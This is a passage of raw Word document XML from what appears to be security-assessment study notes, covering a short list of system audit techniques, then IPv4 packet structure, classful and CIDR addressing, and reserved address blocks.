                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Audit Techniques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Listing processes and their associated network</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00800AF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>sockets (if any).</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Assessing patch levels.</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Finding interesting files.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="889"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5F25BF" w:rsidRDefault="005F25BF" w:rsidP="005F25BF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00335CD8" w:rsidRDefault="00335CD8">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00335CD8" w:rsidRDefault="00335CD8" w:rsidP="00335CD8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B1 - IP Protocols </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00335CD8" w:rsidRDefault="00335CD8" w:rsidP="00CD6B06">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B1a - </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE3290">
        <w:t>IP protocols: I</w:t>
      </w:r>
      <w:r>
        <w:t>Pv4 and IPv6, TCP, UDP and ICMP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00335CD8" w:rsidRPr="00F96C65" w:rsidRDefault="00335CD8" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F96C65">
        <w:t>Internet Protocol version 4 (IPv4)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00104020" w:rsidRPr="00D1486B" w:rsidRDefault="002E36C7" w:rsidP="00335CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">IP provides a host to host transport mechanism </w:t>
      </w:r>
      <w:r w:rsidR="00104020" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>and is the workhorse of the TCP/IP protocol suite. IP provides</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> an unreliable</w:t>
      </w:r>
      <w:r w:rsidR="00104020" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> connectionless datagram delivery service </w:t>
      </w:r>
      <w:r w:rsidR="00104020" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">meaning that there are no guarantees that an IP datagram will successfully reach its destination; it is a best effort service. If something goes wrong IP has a simple error handling mechanism; it discards the datagram and tries to send an ICMP message back to the source. Any reliability must be provided by an upper layer. As IP is connectionless it does not maintain state information about successive datagrams. Datagrams can be delivered out of order so IP </w:t>
      </w:r>
      <w:r w:rsidR="0047165B" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>has a re-ordering capability. To cater for varying link layer MTUs</w:t>
      </w:r>
      <w:r w:rsidR="00F7334E" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP also supports fragmentation of datagrams.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00335CD8" w:rsidRPr="00D1486B" w:rsidRDefault="0047165B" w:rsidP="00335CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The IP protocol is o</w:t>
      </w:r>
      <w:r w:rsidR="002E36C7" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pen to spoofing and injection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047165B" w:rsidRPr="00D1486B" w:rsidRDefault="0047165B" w:rsidP="00335CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Packet Structure:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1155"/>
        <w:gridCol w:w="1155"/>
        <w:gridCol w:w="2310"/>
        <w:gridCol w:w="875"/>
        <w:gridCol w:w="3747"/>
      </w:tblGrid>
      <w:tr w:rsidR="0047165B" w:rsidTr="00886581">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1155" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0047165B" w:rsidRPr="0047165B" w:rsidRDefault="0047165B" w:rsidP="00F7334E">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0047165B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>4bit Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1155"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4bit H</w:t>
            </w:r>
            <w:r w:rsidR="0047165B" w:rsidRPr="0047165B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>eader length</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2310"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Type O</w:t>
            </w:r>
            <w:r w:rsidR="0047165B" w:rsidRPr="0047165B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>f Service (TOS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4622"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16bit T</w:t>
            </w:r>
            <w:r w:rsidR="00F7334E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>otal length (bytes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0047165B" w:rsidTr="00F7334E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4620" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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 xml:space="preserve">16bit </w:t>
            </w:r>
            <w:r w:rsidR="00B4650E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>I</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>dentification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="875" w:type="dxa"/>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3bit flags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3747"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13bit F</w:t>
            </w:r>
            <w:r w:rsidR="00F7334E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>ragmentation offset</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0047165B" w:rsidTr="00886581">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2310"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Time To L</w:t>
            </w:r>
            <w:r w:rsidR="00F7334E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>ive (TTL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2310"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P</w:t>
            </w:r>
            <w:r w:rsidR="00F7334E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>rotocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4622"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16bit H</w:t>
            </w:r>
            <w:r w:rsidR="00F7334E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>eader checksum</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0047165B" w:rsidTr="00886581">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9242" w:type="dxa"/>
            <w:gridSpan w:val="5"/>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32bit S</w:t>
            </w:r>
            <w:r w:rsidR="00F7334E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>ource IP address</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0047165B" w:rsidTr="00886581">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9242" w:type="dxa"/>
            <w:gridSpan w:val="5"/>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32bit D</w:t>
            </w:r>
            <w:r w:rsidR="00F7334E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>estination IP address</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0047165B" w:rsidTr="00886581">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9242" w:type="dxa"/>
            <w:gridSpan w:val="5"/>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Options (if any)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0047165B" w:rsidTr="00886581">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9242" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
          </w:tcPr>
          <w:p w:rsidR="0047165B" w:rsidRPr="0047165B" w:rsidRDefault="00D25A70"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D</w:t>
            </w:r>
            <w:r w:rsidR="00F7334E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>ata</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E52A69" w:rsidRDefault="00E52A69" w:rsidP="00335CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A2501E" w:rsidRPr="00D1486B" w:rsidRDefault="00017FB7" w:rsidP="00335CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Addressing</w:t>
      </w:r>
      <w:r w:rsidR="00B4650E" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A2501E" w:rsidRPr="00D1486B" w:rsidRDefault="00A2501E" w:rsidP="00335CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Classfull</w:t>
      </w:r>
      <w:r w:rsidR="00017FB7" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="2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8"/>
        <w:gridCol w:w="611"/>
        <w:gridCol w:w="1186"/>
        <w:gridCol w:w="996"/>
        <w:gridCol w:w="1204"/>
        <w:gridCol w:w="1285"/>
        <w:gridCol w:w="971"/>
        <w:gridCol w:w="1191"/>
      </w:tblGrid>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Leading</w:t>
            </w:r>
            <w:r w:rsidRPr="00017FB7">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:br/>
              <w:t>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 xml:space="preserve">Size of </w:t>
            </w:r>
            <w:r w:rsidRPr="00017FB7">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Network</w:t>
            </w:r>
            <w:r w:rsidRPr="00017FB7">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:br/>
              <w:t>Number</w:t>
            </w:r>
            <w:r w:rsidRPr="00017FB7">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> 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 xml:space="preserve">Size of </w:t>
            </w:r>
            <w:r w:rsidRPr="00017FB7">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Rest</w:t>
            </w:r>
            <w:r w:rsidRPr="00017FB7">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:br/>
              <w:t>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Number</w:t>
            </w:r>
            <w:r w:rsidRPr="00017FB7">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:br/>
              <w:t>of Networks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Addresses</w:t>
            </w:r>
            <w:r w:rsidRPr="00017FB7">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:br/>
              <w:t>per Network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Start address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End address</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128 (2</w:t>
            </w:r>
            <w:r w:rsidRPr="00017FB7">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:vertAlign w:val="superscript"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>7</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16,777,216 (2</w:t>
            </w:r>
            <w:r w:rsidRPr="00017FB7">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:vertAlign w:val="superscript"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>24</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127.255.255.255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lastRenderedPageBreak/>
              <w:t>Class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16,384 (2</w:t>
            </w:r>
            <w:r w:rsidRPr="00017FB7">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:vertAlign w:val="superscript"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>14</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65,536 (2</w:t>
            </w:r>
            <w:r w:rsidRPr="00017FB7">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:vertAlign w:val="superscript"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>16</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128.0.0.0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191.255.255.255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2,097,152 (2</w:t>
            </w:r>
            <w:r w:rsidRPr="00017FB7">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:vertAlign w:val="superscript"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>21</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256 (2</w:t>
            </w:r>
            <w:r w:rsidRPr="00017FB7">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:vertAlign w:val="superscript"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>8</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192.0.0.0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223.255.255.255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D (</w:t>
            </w:r>
            <w:hyperlink r:id="rId9" w:tooltip="Multicast" w:history="1">
              <w:r w:rsidRPr="00017FB7">
                <w:rPr>
                  <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                  <w:color w:val="0000FF"/>
                  <w:sz w:val="16"/>
                  <w:szCs w:val="16"/>
                  <w:u w:val="single"/>
                  <w:lang w:eastAsia="en-GB"/>
                </w:rPr>
                <w:t>multicast</w:t>
              </w:r>
            </w:hyperlink>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224.0.0.0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239.255.255.255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E (reserved)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255.255.255</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A2501E" w:rsidRDefault="00A2501E" w:rsidP="00335CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00017FB7" w:rsidRPr="00D1486B" w:rsidRDefault="00017FB7" w:rsidP="00335CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Classless IP addressing:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00017FB7" w:rsidRPr="00D1486B" w:rsidRDefault="00017FB7" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="851"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Subnetting - Subnets were introduced to allow classful network to be subdivided. Also includes Variable Length Subnet mask (VLSM) to implement subnets of different sizes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00017FB7" w:rsidRPr="00D1486B" w:rsidRDefault="00017FB7" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="851"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CIDR - The original system of IP adress classes was replaced with Classless Inter-Domain Routing (CIDR. CIDR's primary advantage is to allow repartitioning of any address space so that smaller or larger blocks of addresses may be allocated to users. The hierarchical structure created by CIDR and overseen by the Internet Assigned Numbers Authority (IANA) and its Regional Internet Registries (RIRs), manages the assignment of Internet addresses worldwide. Each RIR maintains a publicly-searchable WHOIS database that provides information about IP address assignments; information from these databases plays a central role in numerous tools that attempt to locate IP addresses geographically.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A2501E" w:rsidRPr="00D1486B" w:rsidRDefault="00D25A70" w:rsidP="00335CD8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Special Addresses: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58"/>
        <w:gridCol w:w="3156"/>
        <w:gridCol w:w="769"/>
      </w:tblGrid>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Pr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>CIDR a</w:t>
            </w:r>
            <w:r w:rsidRPr="00D25A70">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>ddress block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sidRPr="00D25A70">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>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sidRPr="00D25A70">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Reference</w:t>
            </w:r>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0.0.0.0/8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Current network (only valid as source address)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0" w:history="1">
              <w:r w:rsidR="00D25A70" w:rsidRPr="00D25A70">
                <w:rPr>
                  <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                  <w:color w:val="0000FF"/>
                  <w:sz w:val="16"/>
                  <w:szCs w:val="16"/>
                  <w:u w:val="single"/>
                  <w:lang w:eastAsia="en-GB"/>
                </w:rPr>
                <w:t>RFC 1700</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10.0.0.0/8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1"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127.0.0.0/8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Loopback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2"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169.254.0.0/16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Link-Local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3" w:history="1">
              <w:r w:rsidR="00D25A70" w:rsidRPr="00D25A70">
                <w:rPr>
                  <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                  <w:color w:val="0000FF"/>
                  <w:sz w:val="16"/>
